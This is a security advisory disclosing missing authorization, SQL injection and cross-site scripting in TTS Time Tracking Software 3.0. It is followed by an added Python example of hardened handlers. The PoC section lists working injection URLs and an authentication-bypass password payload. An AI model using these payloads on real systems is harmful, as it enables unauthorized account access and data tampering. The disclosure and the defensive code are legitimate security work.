Multiple Vulnerabilities in Time Tracking Software
Summary
- Vulnerability: Multiple Vulnerabilities in Time Tracking Software
- Discovered: 2006.02.08
- Last Update: 2006.02.18 (exploitation code published)
- ID: EV0069
- CVE: CVE-2006-0689, CVE-2006-0690, CVE-2006-0691
- Risk Level: medium
- Type: Multiple Vulnerabilities
- Status: Unpatched. No reply from developer(s)
- Vendor: TTS Software
- Vulnerable Software: Time Tracking Software (http://schedulingmanagement.com/download-time-tracking-software-now.php)
- Version: 3.0
- PoC/Exploit: Available
- Solution: Not available
- Discovered by: Aliaksandr Hartsuyeu (eVuln.com)
Description
Multiple vulnerabilities were found in the Time Tracking Software (http://schedulingmanagement.com/download-time-tracking-software-now.php) script.
1. Unauthorized data modification is possible.
The script edituser.php does not check the user name and password, and therefore allows the data of any user to be modified.
2. Multiple SQL Injections
Most user-supplied data is not properly sanitized. This can be used to bypass authentication or to run arbitrary SQL queries by injecting SQL code.
3. Cross-Site Scripting
The UserName value in the registration form is not properly sanitized. This can be used to insert arbitrary HTML or JavaScript code.
PoC/Exploit
1. Unauthorized data modification
http://host/timetracking/edituser.php?num=[userid]
2a. SQL Injection Example
http://host/timetracking/edituser.php?num=999%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13/*
2b. Authentication Bypass Example
Url: http://host/timetracking/login.php
Name: any
Password: ' union select 1,2,3,4,5,6,7,8,9,10,11,12,13/*
3. Cross-Site Scripting Example
Url: http://host/timetracking/register.php
User Name: <XSS>
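Added example, not part of the original advisory and not TTS Software's code: the three defects described above, shown as hardened handlers in Python with sqlite3. The table layout, column names and sample users are constructed assumptions; the inputs checked are the payloads listed in the PoC section, which the hardened code treats as plain data.

```python
import hashlib
import hmac
import html
import os
import sqlite3


def _hash_password(password: str, salt: bytes) -> bytes:
    # PBKDF2 so a leaked users table does not expose plaintext passwords.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def setup_db() -> sqlite3.Connection:
    """Constructed in-memory users table with two sample accounts (assumption)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (num INTEGER PRIMARY KEY, name TEXT UNIQUE,"
                 " salt BLOB, pwhash BLOB, email TEXT)")
    for num, name, pw, email in [(1, "alice", "s3cret", "alice@example.test"),
                                 (2, "bob", "hunter2", "bob@example.test")]:
        salt = os.urandom(16)
        conn.execute("INSERT INTO users VALUES (?, ?, ?, ?, ?)",
                     (num, name, salt, _hash_password(pw, salt), email))
    conn.commit()
    return conn


def login(conn, name, password):
    """Defect 2b: return the user's num on success, else None. The name is bound
    as a query parameter, so a quote-and-UNION payload is compared as literal text."""
    row = conn.execute("SELECT num, salt, pwhash FROM users WHERE name = ?",
                       (name,)).fetchone()
    if row is None:
        return None
    num, salt, pwhash = row
    return num if hmac.compare_digest(_hash_password(password, salt), pwhash) else None


def edit_user(conn, session_num, num, new_email):
    """Defects 1 and 2a: only the authenticated user may edit their own row, and
    the num parameter must be an integer before it reaches the bound query."""
    try:
        target = int(num)
    except (TypeError, ValueError):
        return False
    if session_num is None or target != session_num:
        return False
    cur = conn.execute("UPDATE users SET email = ? WHERE num = ?", (new_email, target))
    conn.commit()
    return cur.rowcount == 1


def render_username(name):
    """Defect 3: escape the user name before placing it in HTML."""
    return html.escape(name, quote=True)
```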
Solution
A solution for "Multiple Vulnerabilities in Time Tracking Software" is not available. Check the TTS Software website for updates.